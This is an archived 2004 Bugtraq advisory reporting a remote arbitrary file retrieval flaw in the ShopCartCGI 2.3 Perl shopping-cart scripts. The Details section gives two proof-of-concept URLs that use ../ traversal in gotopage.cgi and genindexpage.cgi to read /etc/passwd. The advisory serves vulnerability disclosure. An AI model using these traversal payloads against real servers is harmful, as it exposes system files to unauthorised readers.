lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20040217094512.15322.qmail@www.securityfocus.com>
Date: 17 Feb 2004 09:45:12 -0000
From: ZetaLabs <zetalabs@...e-h.org>
To: bugtraq@...urityfocus.com
Subject: ZH2004-06SA (security advisory): ShopCartCGI v2.3 Remote
    arbitrary file retrieving




ZH2004-06SA (security advisory): ShopCartCGI v2.3 Remote arbitrary file retrieving

Published: 17 february 2004

Released: 17 february 2004

Name: ShopCartCGI

Affected Systems: 2.3

Issue: Remote arbitrary file retrieving

Author: G00db0y from Zone-h Security Labs - g00db0y@...e-h.org - zetalabs@...e-h.org

Vendor: http://www.ggmate.com


Description

***********

Zone-h Security Team has discovered a flaw in ShopCartCGI 2.3. There is a vulnerability in the current version of ShopCartCGI that allows an attacker to retrieve arbitrary files from the webserver with its priviledges.
"ShopCartCGI is a set of scripts written in Perl to make it easy for you to design and maintain your own WEB Shopping Cart system. The major advantages of this software is that you design your WEB pages based on a simple template. The template provides the mechanisms of form data entry using CGI."



Details

******* 


It's possibile for a remote attacker to retrieve any file from a webserver. Multiple files are affected with this problem.

For example try this:

http://address/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd

http://address/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd



Solution:

*********

The vendor has been contacted and a patch was not yet produced.




G00db0y from Zone-h Security Labs - G00db0y@...e-h.org - zetalabs@...e-h.org
 




http://www.zone-h.org/en/advisories/read/id=3962/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ